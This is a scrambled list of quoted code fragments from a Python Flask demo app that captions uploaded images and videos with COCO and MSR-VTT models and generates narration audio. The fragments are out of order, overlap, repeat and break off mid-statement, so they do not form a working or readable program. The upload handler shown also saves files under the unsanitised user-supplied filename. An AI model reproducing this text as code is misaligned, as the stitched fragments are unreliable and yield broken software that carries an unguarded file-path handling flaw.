"in samplesDF['id'].values.tolist()][ :len(vid_names)] # Generate sample information and store to file for i,",
"samples directory shutil.copy(url, app.config['SAMPLES_DIR'] + name + '.mp4') # Generate audio files narrator.gen_audio_file(",
"in sceneSamplesDF.iterrows(): SCENE_SAMPLES_DICT.append({ 'time': row['time'], 'cap_audio': app.config['SCENE_EXAMPLE_FILE'] + '.' + str(i) + '.ogg',",
"except: samplesDF = pd.DataFrame( columns=['id', 'caption', 'gt'], index=['name']).head() # Update any existing samples",
"'url': 'video' + str(ix) + '.mp4', 'gt': vid_sample['gt'], 'gt_audio': 'video' + str(ix) +",
"caption for given file\"\"\" file.filename = file.filename.replace(' ', '_') @app.route('/') @app.route('/index') def index():",
"msrvttCaptionDF[msrvttCaptionDF['vid_id'] == vid_id]['caption'] gts = gts.apply(lambda x: narrator.msrvtt_vocab.encode( x, app.config['MAX_LEN'] + 1)) gts",
"'.mp4') # Generate audio files narrator.gen_audio_file( gt, app.config['SAMPLES_DIR'] + name + '_gt.ogg') narrator.gen_audio_file(",
"############################################################################## ##################################### APP #################################### ############################################################################## def allowed_file(filename): \"\"\"Determine if a file has an",
"str(ix) + '.ogg' }) print(\"Samples loaded\") # Get filepath for scene example scene_example_file",
"# Load image and video datasets coco = COCO(app.config[ 'COCOAPI_PATH'] + 'annotations/instances_{}.json'.format(app.config['COCO_SET'])) cocoCaptionDF",
"\"\"\"Render demo page.\"\"\" # Check if file is uploaded if request.method == 'POST':",
"IM_SAMPLES_DICT = [[], [], [], []] VID_SAMPLES_DICT = [[], [], [], []] for",
"return '.' in filename and \\ filename.rsplit('.', 1)[1] in app.config['ALLOWED_EXTENSIONS'] def save_file(file): \"\"\"Save",
"video examples page.\"\"\" return render_template('videos.html', vid_dict=VID_SAMPLES_DICT, page='videos', title=app.config['TITLE']) @app.route('/scenes') def scenes(): \"\"\"Render scene",
"sample information and store to file for i, (name, im_id) in enumerate(zip(im_names, rand_im_ids)):",
"given file and return path.\"\"\" file_path = os.path.join(app.config['UPLOAD_DIR'], file.filename) file.save(os.path.join(app.config['UPLOAD_DIR'], file.filename)) return file_path",
"file and allowed_file(file.filename): # Fix filename, save to file, get ext and determine",
"and allowed_file(file.filename): # Fix filename, save to file, get ext and determine type",
"return render_template('demo_output.html', filename=filename, typ=typ, caption=caption, cap_audio=cap_audio, page='demo', title=app.config['TITLE']) @app.route('/uploads/<filename>') def get_upload(filename): \"\"\"Get path",
"+ '.ogg' }) print(\"Samples loaded\") # Get filepath for scene example scene_example_file =",
"== app.config[ 'COCO_SET']].sample(n=32)['id'].values.tolist() rand_im_ids = [x for x in rand_im_ids if x not",
"im_names = [x for x in app.config['SAMPLES_TO_UPDATE'] if 'image' in x] vid_names =",
"# Get all gt captions and encode/decode using vocabulary gts = msrvttCaptionDF[msrvttCaptionDF['vid_id'] ==",
"import sys import shutil import pandas as pd import skimage.io as io import",
"+ '.mp4') # Generate audio files narrator.gen_audio_file( gt, app.config['SAMPLES_DIR'] + name + '_gt.ogg')",
"request.form # Check if filetype is allowed if file and allowed_file(file.filename): # Fix",
"[]] VID_SAMPLES_DICT = [[], [], [], []] for i, ix in enumerate(range(16)): im_sample",
"sceneSamplesDF = pd.read_csv(scene_example_file + '.csv') # Load scene example SCENE_SAMPLES_DICT = [] for",
"for gt in gts: bleu = narrator.coco_vocab.evaluate([gt], caption) if bleu > best_score: best_score",
"'cap_audio': 'image' + str(ix) + '.ogg' }) VID_SAMPLES_DICT[int(i / 4)].append({ 'id': vid_sample['id'], 'url':",
"im_dict=IM_SAMPLES_DICT, page='images', title=app.config['TITLE']) @app.route('/videos') def videos(): \"\"\"Render video examples page.\"\"\" return render_template('videos.html', vid_dict=VID_SAMPLES_DICT,",
"= '' best_score = 0.0 for gt in gts: bleu = narrator.msrvtt_vocab.evaluate([gt], caption)",
"exist if not os.path.exists(scene_example_file + '.csv'): # Generate captions by scene captions, scene_change_timecodes",
"+ name + '.ogg') # update samples dataframe samplesDF.loc[name, 'id'] = vid_id samplesDF.loc[name,",
"scenes(): \"\"\"Render scene examples page.\"\"\" return render_template('scenes.html', page='scenes', scenes_dict=SCENE_SAMPLES_DICT, title=app.config['TITLE']) @app.route('/contact') def contact():",
"\"\"\"Render about page.\"\"\" return render_template('about.html', page='about', title=app.config['TITLE']) @app.route('/demo', methods=['GET', 'POST']) def demo(): \"\"\"Render",
"time_codes = narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'], as_string=True, by_scene=by_scene) scenes_dict = [] for i, caption",
"x in app.config['SAMPLES_TO_UPDATE'] if 'image' in x] vid_names = [x for x in",
"best_score = 0.0 for gt in gts: bleu = narrator.msrvtt_vocab.evaluate([gt], caption) if bleu",
"gt in gts: bleu = narrator.coco_vocab.evaluate([gt], caption) if bleu > best_score: best_score =",
"captions }) # Capitalize sceneSamplesDF['caption'] = sceneSamplesDF[ 'caption'].apply(lambda x: x.capitalize()) # Generate audio",
"Generate caption/audio and redirect to demo_output page if not by_scene: caption = narrator.gen_caption(file_path,",
"rand_im_ids = [x for x in rand_im_ids if x not in samplesDF['id'].values.tolist()][ :len(im_names)]",
"to demo_output page if not by_scene: caption = narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize()",
"by_scene=by_scene) scenes_dict = [] for i, caption in enumerate(captions): narrator.gen_audio_file(caption, app.config['UPLOAD_DIR'] + filename",
"' '.join(nearest_gt).capitalize() caption = ' '.join(caption).capitalize() # Load and save imge im =",
"file has an allowed extension.\"\"\" return '.' in filename and \\ filename.rsplit('.', 1)[1]",
"+ name + '_gt.ogg') narrator.gen_audio_file( caption, app.config['SAMPLES_DIR'] + name + '.ogg') # Update",
"caption/audio by scene and redirect to demo_output # page captions, time_codes = narrator.gen_caption(file_path,",
"'_gt.ogg', 'caption': vid_sample['caption'], 'cap_audio': 'video' + str(ix) + '.ogg' }) print(\"Samples loaded\") #",
"# Capitalize sceneSamplesDF['caption'] = sceneSamplesDF[ 'caption'].apply(lambda x: x.capitalize()) # Generate audio files for",
"in enumerate(zip(vid_names, rand_vid_ids)): # Get video and generated caption url = app.config['MSRVTT_DATA_PATH'] +",
"= gts.apply(lambda x: narrator.coco_vocab.encode( x, app.config['MAX_LEN'] + 1)) gts = gts.apply(lambda x: narrator.coco_vocab.decode(x,",
"name + '.mp4') # Generate audio files narrator.gen_audio_file( gt, app.config['SAMPLES_DIR'] + name +",
"caption=caption, cap_audio=cap_audio, page='demo', title=app.config['TITLE']) @app.route('/uploads/<filename>') def get_upload(filename): \"\"\"Get path to file in upload",
"= samplesDF.loc['video' + str(ix)] IM_SAMPLES_DICT[int(i / 4)].append({ 'id': im_sample['id'], 'url': 'image' + str(ix)",
"im.save(app.config['SAMPLES_DIR'] + name + '.jpg') # Generate audio files narrator.gen_audio_file( gt, app.config['SAMPLES_DIR'] +",
"'vid_id'].values.tolist() rand_vid_ids = [x for x in rand_vid_ids if x not in samplesDF['id'].values.tolist()][",
"+ '.ogg') # Save samples dataframe sceneSamplesDF.to_csv(scene_example_file + '.csv', index=False) # Load samples",
"video.\"\"\" if ext in app.config['VID_EXTENSIONS']: if by_scene: return 'scene' return 'video' return 'image'",
"chosen rand_im_ids = cocoCaptionDF[cocoCaptionDF['set'] == app.config[ 'COCO_SET']].sample(n=32)['id'].values.tolist() rand_im_ids = [x for x in",
"dataframe samplesDF.loc[name, 'id'] = im_id samplesDF.loc[name, 'caption'] = caption samplesDF.loc[name, 'gt'] = gt",
"'' best_score = 0.0 for gt in gts: bleu = narrator.coco_vocab.evaluate([gt], caption) if",
"gts: bleu = narrator.coco_vocab.evaluate([gt], caption) if bleu > best_score: best_score = bleu nearest_gt",
"sceneSamplesDF['caption'] = sceneSamplesDF[ 'caption'].apply(lambda x: x.capitalize()) # Generate audio files for each caption",
"file.filename) file.save(os.path.join(app.config['UPLOAD_DIR'], file.filename)) return file_path def split_filename(file): \"\"\"Split filename into name and ext.\"\"\"",
"1)) gts = gts.apply(lambda x: narrator.coco_vocab.decode(x, clean=True)) # Find nearest gt nearest_gt =",
"1)[1] in app.config['ALLOWED_EXTENSIONS'] def save_file(file): \"\"\"Save given file and return path.\"\"\" file_path =",
"import COCO sys.path.append('../src/') from Narrator import Narrator # Construct classes narrator = Narrator(",
"'cap_audio': 'video' + str(ix) + '.ogg' }) print(\"Samples loaded\") # Get filepath for",
"narrator.gen_audio_file( caption, app.config['SAMPLES_DIR'] + name + '.ogg') # update samples dataframe samplesDF.loc[name, 'id']",
"and generated caption url = coco.loadImgs(im_id)[0]['coco_url'] caption = narrator.gen_caption(url, beam_size=8) # Get all",
"= narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize() cap_audio = filename + '.ogg' narrator.gen_audio_file( caption,",
"= [] for i, caption in enumerate(captions): narrator.gen_audio_file(caption, app.config['UPLOAD_DIR'] + filename + '.'",
"caption=caption, typ=typ)) # Generate caption/audio by scene and redirect to demo_output # page",
"columns=['id', 'caption', 'gt'], index=['name']).head() # Update any existing samples if len(app.config['SAMPLES_TO_UPDATE']) > 0:",
"= app.config[ 'SAMPLES_DIR'] + app.config['SCENE_EXAMPLE_FILE'] # Create scene example if it doesn't already",
"app.config['UPLOAD_DIR'] + cap_audio) return redirect(url_for('uploaded_file', filename=file.filename, cap_audio=cap_audio, caption=caption, typ=typ)) # Generate caption/audio by",
"KeyError as e: print(e) return render_template('demo.html', page='demo', title=app.config['TITLE']) @app.route('/demo/<filename>&<cap_audio>&<typ>&<caption>', methods=['GET', 'POST']) def uploaded_file(filename,",
"images(): \"\"\"Render image examples page.\"\"\" return render_template('images.html', im_dict=IM_SAMPLES_DICT, page='images', title=app.config['TITLE']) @app.route('/videos') def videos():",
"if not by_scene: caption = narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize() cap_audio = filename",
"dataframe sceneSamplesDF.to_csv(scene_example_file + '.csv', index=False) # Load samples dataframe else: sceneSamplesDF = pd.read_csv(scene_example_file",
"= narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'], as_string=True, by_scene=by_scene) scenes_dict = [] for i, caption in",
"i, caption in enumerate(captions): narrator.gen_audio_file(caption, app.config['UPLOAD_DIR'] + filename + '.' + str(i) +",
"\"\"\"Save given file and return path.\"\"\" file_path = os.path.join(app.config['UPLOAD_DIR'], file.filename) file.save(os.path.join(app.config['UPLOAD_DIR'], file.filename)) return",
"'caption', 'gt'], index=['name']).head() # Update any existing samples if len(app.config['SAMPLES_TO_UPDATE']) > 0: #",
"vid_id]['caption'] gts = gts.apply(lambda x: narrator.msrvtt_vocab.encode( x, app.config['MAX_LEN'] + 1)) gts = gts.apply(lambda",
"else: sceneSamplesDF = pd.read_csv(scene_example_file + '.csv') # Load scene example SCENE_SAMPLES_DICT = []",
"app.config['MSRVTT_DATA_PATH'] + vid_id + '.mp4' caption = narrator.gen_caption(url, beam_size=8) # Get all gt",
"if filetype is allowed if file and allowed_file(file.filename): # Fix filename, save to",
"caption in enumerate(captions): narrator.gen_audio_file( caption, scene_example_file + '.' + str(i) + '.ogg') #",
"Update any existing samples if len(app.config['SAMPLES_TO_UPDATE']) > 0: # Load image and video",
"0.0 for gt in gts: bleu = narrator.msrvtt_vocab.evaluate([gt], caption) if bleu > best_score:",
"Get filepath for scene example scene_example_file = app.config[ 'SAMPLES_DIR'] + app.config['SCENE_EXAMPLE_FILE'] # Create",
"by_scene): \"\"\"Determine if image or video.\"\"\" if ext in app.config['VID_EXTENSIONS']: if by_scene: return",
"methods=['GET', 'POST']) def uploaded_file(filename, typ='image', caption=\"\", cap_audio=None): \"\"\"Render demo output page.\"\"\" # Duplicate",
"and videos to update im_names = [x for x in app.config['SAMPLES_TO_UPDATE'] if 'image'",
"save imge im = PIL.Image.fromarray(io.imread(url)).convert('RGB') im.save(app.config['SAMPLES_DIR'] + name + '.jpg') # Generate audio",
"gts = msrvttCaptionDF[msrvttCaptionDF['vid_id'] == vid_id]['caption'] gts = gts.apply(lambda x: narrator.msrvtt_vocab.encode( x, app.config['MAX_LEN'] +",
"+ '.' + str(i) + '.ogg', 'caption': caption.capitalize() }) session['scenes_dict'] = scenes_dict return",
"= samplesDF.loc['image' + str(ix)] vid_sample = samplesDF.loc['video' + str(ix)] IM_SAMPLES_DICT[int(i / 4)].append({ 'id':",
"app.config['UPLOAD_DIR'] + filename + '.' + str(i) + '.ogg') scenes_dict.append({ 'time': time_codes[i], 'cap_audio':",
"}) ############################################################################## ##################################### APP #################################### ############################################################################## def allowed_file(filename): \"\"\"Determine if a file has",
"# update samples dataframe samplesDF.loc[name, 'id'] = vid_id samplesDF.loc[name, 'caption'] = caption samplesDF.loc[name,",
"'image' def generate_caption(file, by_scene): \"\"\"Generate caption for given file\"\"\" file.filename = file.filename.replace(' ',",
"file.filename)) return file_path def split_filename(file): \"\"\"Split filename into name and ext.\"\"\" *filename, ext",
"narrator.gen_caption(file_path, beam_size=app.config['BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize() cap_audio = filename + '.ogg' narrator.gen_audio_file( caption, app.config['UPLOAD_DIR'] +",
"beam_size=8) # Get all gt captions and encode/decode using vocabulary gts = msrvttCaptionDF[msrvttCaptionDF['vid_id']",
"@app.route('/index') def index(): \"\"\"Render homepage.\"\"\" return render_template('main.html', page='main', title=app.config['TITLE']) @app.route('/images') def images(): \"\"\"Render",
"given file\"\"\" file.filename = file.filename.replace(' ', '_') @app.route('/') @app.route('/index') def index(): \"\"\"Render homepage.\"\"\"",
"vid_id samplesDF.loc[name, 'caption'] = caption samplesDF.loc[name, 'gt'] = gt print('Videos updated!') # Save",
"= caption samplesDF.loc[name, 'gt'] = gt print('Videos updated!') # Save samples dataframe samplesDF.to_csv(app.config['SAMPLES_DIR']",
"'.' + str(i) + '.ogg') # Save samples dataframe sceneSamplesDF.to_csv(scene_example_file + '.csv', index=False)",
"pd.read_csv(scene_example_file + '.csv') # Load scene example SCENE_SAMPLES_DICT = [] for i, row",
"name and ext.\"\"\" *filename, ext = file.filename.split('.') if isinstance(filename, list): filename = '_'.join(filename)",
"datasets coco = COCO(app.config[ 'COCOAPI_PATH'] + 'annotations/instances_{}.json'.format(app.config['COCO_SET'])) cocoCaptionDF = pd.read_csv( app.config['COCOAPI_PATH'] + 'annotations/coco_captions.csv')",
"by_scene = False # Generate caption/audio and redirect to demo_output page if not",
"to demo_output # page captions, time_codes = narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'], as_string=True, by_scene=by_scene) scenes_dict",
"demo_output page if not by_scene: caption = narrator.gen_caption(file_path, beam_size=app.config['BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize() cap_audio =",
"session['scenes_dict'] = scenes_dict return redirect(url_for('uploaded_file', filename=file.filename, typ='scene', caption='scene', cap_audio='scene')) except KeyError as e:",
"typ=typ)) # Generate caption/audio by scene and redirect to demo_output # page captions,",
"if not by_scene: caption = narrator.gen_caption(file_path, beam_size=app.config['BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize() cap_audio = filename +",
"samplesDF.loc[name, 'gt'] = gt print('Videos updated!') # Save samples dataframe samplesDF.to_csv(app.config['SAMPLES_DIR'] + 'sample_captions.csv')",
"# Replace existing . with _ return filename, ext def determine_type(ext, by_scene): \"\"\"Determine",
"'_') file_path = save_file(file) filename, ext = split_filename(file) typ = determine_type(ext, by_scene) if",
"str(i) + '.ogg', 'caption': caption.capitalize() }) session['scenes_dict'] = scenes_dict return redirect(url_for('uploaded_file', filename=file.filename, typ='scene',",
"ext.\"\"\" *filename, ext = file.filename.split('.') if isinstance(filename, list): filename = '_'.join(filename) # Replace",
"= pd.read_csv(scene_example_file + '.csv') # Load scene example SCENE_SAMPLES_DICT = [] for i,",
"ic_model_path=app.config['IC_MODEL_PATH'], vc_model_path=app.config['VC_MODEL_PATH'], ic_rnn_type=app.config['IC_RNN_TYPE'], vc_rnn_type=app.config['VC_RNN_TYPE'] ) # Load samples from file try: samplesDF =",
"shutil import pandas as pd import skimage.io as io import PIL from flask",
"narrator.gen_audio_file(caption, app.config['UPLOAD_DIR'] + filename + '.' + str(i) + '.ogg') scenes_dict.append({ 'time': time_codes[i],",
"index=['name']).head() # Update any existing samples if len(app.config['SAMPLES_TO_UPDATE']) > 0: # Load image",
"to file for i, (name, im_id) in enumerate(zip(im_names, rand_im_ids)): # Get image and",
"'.ogg') # Update samples dataframe samplesDF.loc[name, 'id'] = im_id samplesDF.loc[name, 'caption'] = caption",
"in gts: bleu = narrator.msrvtt_vocab.evaluate([gt], caption) if bleu > best_score: best_score = bleu",
"os.path.exists(scene_example_file + '.csv'): # Generate captions by scene captions, scene_change_timecodes = narrator.gen_caption( scene_example_file",
"== im_id]['caption'] gts = gts.apply(lambda x: narrator.coco_vocab.encode( x, app.config['MAX_LEN'] + 1)) gts =",
"def contact(): \"\"\"Render contact me page.\"\"\" return render_template('contact.html', page='contact', title=app.config['TITLE']) @app.route('/about') def about():",
"[] for i, caption in enumerate(captions): narrator.gen_audio_file(caption, app.config['UPLOAD_DIR'] + filename + '.' +",
"import app sys.path.append(app.config['COCOAPI_PATH'] + 'PythonAPI') from pycocotools.coco import COCO sys.path.append('../src/') from Narrator import",
"enumerate(captions): narrator.gen_audio_file(caption, app.config['UPLOAD_DIR'] + filename + '.' + str(i) + '.ogg') scenes_dict.append({ 'time':",
"title=app.config['TITLE']) @app.route('/demo/<filename>&<cap_audio>&<typ>&<caption>', methods=['GET', 'POST']) def uploaded_file(filename, typ='image', caption=\"\", cap_audio=None): \"\"\"Render demo output page.\"\"\"",
"ext and determine type file.filename = file.filename.replace(' ', '_') file_path = save_file(file) filename,",
"page.\"\"\" # Duplicate of above -- allows if request.method == 'POST': try: #",
"= [x for x in rand_im_ids if x not in samplesDF['id'].values.tolist()][ :len(im_names)] rand_vid_ids",
"in gts: bleu = narrator.coco_vocab.evaluate([gt], caption) if bleu > best_score: best_score = bleu",
"'by_scene' in request.form # Check if filetype is allowed if file and allowed_file(file.filename):",
":len(vid_names)] # Generate sample information and store to file for i, (name, im_id)",
"page if not by_scene: caption = narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize() cap_audio =",
"and encode/decode using vocabulary gts = cocoCaptionDF[cocoCaptionDF['id'] == im_id]['caption'] gts = gts.apply(lambda x:",
"typ == 'image': by_scene = False # Generate caption/audio and redirect to demo_output",
"Construct classes narrator = Narrator( root_path=app.config['ROOT_PATH'], coco_vocab_path=app.config['COCO_VOCAB_PATH'], msrvtt_vocab_path=app.config['MSRVTT_VOCAB_PATH'], base_model=app.config['ENCODER_MODEL'], ic_model_path=app.config['IC_MODEL_PATH'], vc_model_path=app.config['VC_MODEL_PATH'], ic_rnn_type=app.config['IC_RNN_TYPE'], vc_rnn_type=app.config['VC_RNN_TYPE']",
"x: x.capitalize()) # Generate audio files for each caption for i, caption in",
"x, app.config['MAX_LEN'] + 1)) gts = gts.apply(lambda x: narrator.coco_vocab.decode(x, clean=True)) # Find nearest",
"app. \"\"\" import os import sys import shutil import pandas as pd import",
"= bleu nearest_gt = gt gt = ' '.join(nearest_gt).capitalize() caption = ' '.join(caption).capitalize()",
"return path.\"\"\" file_path = os.path.join(app.config['UPLOAD_DIR'], file.filename) file.save(os.path.join(app.config['UPLOAD_DIR'], file.filename)) return file_path def split_filename(file): \"\"\"Split",
"pd.read_csv(app.config['MSRVTT_CAPTION_PATH']) # Determine images and videos to update im_names = [x for x",
"render_template, request, redirect, url_for, send_from_directory, session from app import app sys.path.append(app.config['COCOAPI_PATH'] + 'PythonAPI')",
"enumerate(captions): narrator.gen_audio_file( caption, scene_example_file + '.' + str(i) + '.ogg') # Save samples",
"gt print('Images updated!') for i, (name, vid_id) in enumerate(zip(vid_names, rand_vid_ids)): # Get video",
"app.config['SCENE_EXAMPLE_FILE'] # Create scene example if it doesn't already exist if not os.path.exists(scene_example_file",
"pd.DataFrame({ 'time': scene_change_timecodes, 'caption': captions }) # Capitalize sceneSamplesDF['caption'] = sceneSamplesDF[ 'caption'].apply(lambda x:",
"methods=['GET', 'POST']) def demo(): \"\"\"Render demo page.\"\"\" # Check if file is uploaded",
"= im_id samplesDF.loc[name, 'caption'] = caption samplesDF.loc[name, 'gt'] = gt print('Images updated!') for",
"+ '.' + str(i) + '.ogg', 'caption': row['caption'].capitalize() }) ############################################################################## ##################################### APP ####################################",
"rand_im_ids)): # Get image and generated caption url = coco.loadImgs(im_id)[0]['coco_url'] caption = narrator.gen_caption(url,",
"e: print(e) return render_template('demo_output.html', filename=filename, typ=typ, caption=caption, cap_audio=cap_audio, page='demo', title=app.config['TITLE']) @app.route('/uploads/<filename>') def get_upload(filename):",
"}) session['scenes_dict'] = scenes_dict return redirect(url_for('uploaded_file', filename=file.filename, typ='scene', caption='scene', cap_audio='scene')) except KeyError as",
"Find the nearest gt nearest_gt = '' best_score = 0.0 for gt in",
"= pd.read_csv( app.config['COCOAPI_PATH'] + 'annotations/coco_captions.csv') msrvttCaptionDF = pd.read_csv(app.config['MSRVTT_CAPTION_PATH']) # Determine images and videos",
"ic_rnn_type=app.config['IC_RNN_TYPE'], vc_rnn_type=app.config['VC_RNN_TYPE'] ) # Load samples from file try: samplesDF = pd.read_csv( app.config['SAMPLES_DIR']",
"clean=True)) # Find the nearest gt nearest_gt = '' best_score = 0.0 for",
"already have been # chosen rand_im_ids = cocoCaptionDF[cocoCaptionDF['set'] == app.config[ 'COCO_SET']].sample(n=32)['id'].values.tolist() rand_im_ids =",
"\"\"\"Generate caption for given file\"\"\" file.filename = file.filename.replace(' ', '_') @app.route('/') @app.route('/index') def",
"' '.join(nearest_gt).capitalize() caption = ' '.join(caption).capitalize() # Copy image to samples directory shutil.copy(url,",
"gt gt = ' '.join(nearest_gt).capitalize() caption = ' '.join(caption).capitalize() # Load and save",
"'BEAM_SIZE'], as_string=True, by_scene=by_scene) scenes_dict = [] for i, caption in enumerate(captions): narrator.gen_audio_file(caption, app.config['UPLOAD_DIR']",
"render_template('demo.html', page='demo', title=app.config['TITLE']) @app.route('/demo/<filename>&<cap_audio>&<typ>&<caption>', methods=['GET', 'POST']) def uploaded_file(filename, typ='image', caption=\"\", cap_audio=None): \"\"\"Render demo",
"gts = gts.apply(lambda x: narrator.coco_vocab.decode(x, clean=True)) # Find nearest gt nearest_gt = ''",
"\"\"\"Render demo output page.\"\"\" # Duplicate of above -- allows if request.method ==",
"+ '.ogg') scenes_dict.append({ 'time': time_codes[i], 'cap_audio': filename + '.' + str(i) + '.ogg',",
"file, and if by_scene is requested from website file = request.files['file'] by_scene =",
"of Narrator web app. \"\"\" import os import sys import shutil import pandas",
"clean=True)) # Find nearest gt nearest_gt = '' best_score = 0.0 for gt",
"== vid_id]['caption'] gts = gts.apply(lambda x: narrator.msrvtt_vocab.encode( x, app.config['MAX_LEN'] + 1)) gts =",
"file, get ext and determine type file.filename = file.filename.replace(' ', '_') file_path =",
"\"\"\"Split filename into name and ext.\"\"\" *filename, ext = file.filename.split('.') if isinstance(filename, list):",
"def generate_caption(file, by_scene): \"\"\"Generate caption for given file\"\"\" file.filename = file.filename.replace(' ', '_')",
"index_col=0) except: samplesDF = pd.DataFrame( columns=['id', 'caption', 'gt'], index=['name']).head() # Update any existing",
"def save_file(file): \"\"\"Save given file and return path.\"\"\" file_path = os.path.join(app.config['UPLOAD_DIR'], file.filename) file.save(os.path.join(app.config['UPLOAD_DIR'],",
"'time': time_codes[i], 'cap_audio': filename + '.' + str(i) + '.ogg', 'caption': caption.capitalize() })",
"'.join(caption).capitalize() # Copy image to samples directory shutil.copy(url, app.config['SAMPLES_DIR'] + name + '.mp4')",
"for i, row in sceneSamplesDF.iterrows(): SCENE_SAMPLES_DICT.append({ 'time': row['time'], 'cap_audio': app.config['SCENE_EXAMPLE_FILE'] + '.' +",
"sys import shutil import pandas as pd import skimage.io as io import PIL",
"+ '.csv'): # Generate captions by scene captions, scene_change_timecodes = narrator.gen_caption( scene_example_file +",
"bleu > best_score: best_score = bleu nearest_gt = gt gt = ' '.join(nearest_gt).capitalize()",
"= msrvttCaptionDF[msrvttCaptionDF['set'] == 'test'].sample(n=32)[ 'vid_id'].values.tolist() rand_vid_ids = [x for x in rand_vid_ids if",
"caption url = coco.loadImgs(im_id)[0]['coco_url'] caption = narrator.gen_caption(url, beam_size=8) # Get all gt captions",
"+ name + '_gt.ogg') narrator.gen_audio_file( caption, app.config['SAMPLES_DIR'] + name + '.ogg') # update",
"filename = '_'.join(filename) # Replace existing . with _ return filename, ext def",
"' '.join(caption).capitalize() # Copy image to samples directory shutil.copy(url, app.config['SAMPLES_DIR'] + name +",
"and redirect to demo_output page if not by_scene: caption = narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'],",
"= '' best_score = 0.0 for gt in gts: bleu = narrator.coco_vocab.evaluate([gt], caption)",
"'image' in x] vid_names = [x for x in app.config['SAMPLES_TO_UPDATE'] if 'video' in",
"their respective datasets and reject any that already have been # chosen rand_im_ids",
"if 'image' in x] vid_names = [x for x in app.config['SAMPLES_TO_UPDATE'] if 'video'",
"# Save samples dataframe sceneSamplesDF.to_csv(scene_example_file + '.csv', index=False) # Load samples dataframe else:",
"= ' '.join(nearest_gt).capitalize() caption = ' '.join(caption).capitalize() # Copy image to samples directory",
". with _ return filename, ext def determine_type(ext, by_scene): \"\"\"Determine if image or",
"IM_SAMPLES_DICT[int(i / 4)].append({ 'id': im_sample['id'], 'url': 'image' + str(ix) + '.jpg', 'gt': im_sample['gt'],",
"enumerate(zip(vid_names, rand_vid_ids)): # Get video and generated caption url = app.config['MSRVTT_DATA_PATH'] + vid_id",
"loaded\") # Get filepath for scene example scene_example_file = app.config[ 'SAMPLES_DIR'] + app.config['SCENE_EXAMPLE_FILE']",
"file.save(os.path.join(app.config['UPLOAD_DIR'], file.filename)) return file_path def split_filename(file): \"\"\"Split filename into name and ext.\"\"\" *filename,",
"Duplicate of above -- allows if request.method == 'POST': try: # Grab file,",
"'id'] = im_id samplesDF.loc[name, 'caption'] = caption samplesDF.loc[name, 'gt'] = gt print('Images updated!')",
"Fix filename, save to file, get ext and determine type file.filename = file.filename.replace('",
"os.path.join(app.config['UPLOAD_DIR'], file.filename) file.save(os.path.join(app.config['UPLOAD_DIR'], file.filename)) return file_path def split_filename(file): \"\"\"Split filename into name and",
"that already have been # chosen rand_im_ids = cocoCaptionDF[cocoCaptionDF['set'] == app.config[ 'COCO_SET']].sample(n=32)['id'].values.tolist() rand_im_ids",
"caption in enumerate(captions): narrator.gen_audio_file(caption, app.config['UPLOAD_DIR'] + filename + '.' + str(i) + '.ogg')",
"samplesDF['id'].values.tolist()][ :len(im_names)] rand_vid_ids = msrvttCaptionDF[msrvttCaptionDF['set'] == 'test'].sample(n=32)[ 'vid_id'].values.tolist() rand_vid_ids = [x for x",
"requested from website file = request.files['file'] by_scene = 'by_scene' in request.form # Check",
"scene_example_file + '.mp4', by_scene=True, as_string=True) # Create dataframe sceneSamplesDF = pd.DataFrame({ 'time': scene_change_timecodes,",
"nearest_gt = '' best_score = 0.0 for gt in gts: bleu = narrator.coco_vocab.evaluate([gt],",
"return render_template('images.html', im_dict=IM_SAMPLES_DICT, page='images', title=app.config['TITLE']) @app.route('/videos') def videos(): \"\"\"Render video examples page.\"\"\" return",
"# Generate captions by scene captions, scene_change_timecodes = narrator.gen_caption( scene_example_file + '.mp4', by_scene=True,",
"by scene captions, scene_change_timecodes = narrator.gen_caption( scene_example_file + '.mp4', by_scene=True, as_string=True) # Create",
"= cocoCaptionDF[cocoCaptionDF['id'] == im_id]['caption'] gts = gts.apply(lambda x: narrator.coco_vocab.encode( x, app.config['MAX_LEN'] + 1))",
"'caption': im_sample['caption'], 'cap_audio': 'image' + str(ix) + '.ogg' }) VID_SAMPLES_DICT[int(i / 4)].append({ 'id':",
"/ 4)].append({ 'id': vid_sample['id'], 'url': 'video' + str(ix) + '.mp4', 'gt': vid_sample['gt'], 'gt_audio':",
"existing samples if len(app.config['SAMPLES_TO_UPDATE']) > 0: # Load image and video datasets coco",
"sceneSamplesDF.iterrows(): SCENE_SAMPLES_DICT.append({ 'time': row['time'], 'cap_audio': app.config['SCENE_EXAMPLE_FILE'] + '.' + str(i) + '.ogg', 'caption':",
"[], []] for i, ix in enumerate(range(16)): im_sample = samplesDF.loc['image' + str(ix)] vid_sample",
"page='contact', title=app.config['TITLE']) @app.route('/about') def about(): \"\"\"Render about page.\"\"\" return render_template('about.html', page='about', title=app.config['TITLE']) @app.route('/demo',",
"'BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize() cap_audio = filename + '.ogg' narrator.gen_audio_file( caption, app.config['UPLOAD_DIR'] + cap_audio)",
"index(): \"\"\"Render homepage.\"\"\" return render_template('main.html', page='main', title=app.config['TITLE']) @app.route('/images') def images(): \"\"\"Render image examples",
"msrvttCaptionDF = pd.read_csv(app.config['MSRVTT_CAPTION_PATH']) # Determine images and videos to update im_names = [x",
"vid_sample['id'], 'url': 'video' + str(ix) + '.mp4', 'gt': vid_sample['gt'], 'gt_audio': 'video' + str(ix)",
"+ '_gt.ogg', 'caption': im_sample['caption'], 'cap_audio': 'image' + str(ix) + '.ogg' }) VID_SAMPLES_DICT[int(i /",
"# page captions, time_codes = narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'], as_string=True, by_scene=by_scene) scenes_dict = []",
"vid_id) in enumerate(zip(vid_names, rand_vid_ids)): # Get video and generated caption url = app.config['MSRVTT_DATA_PATH']",
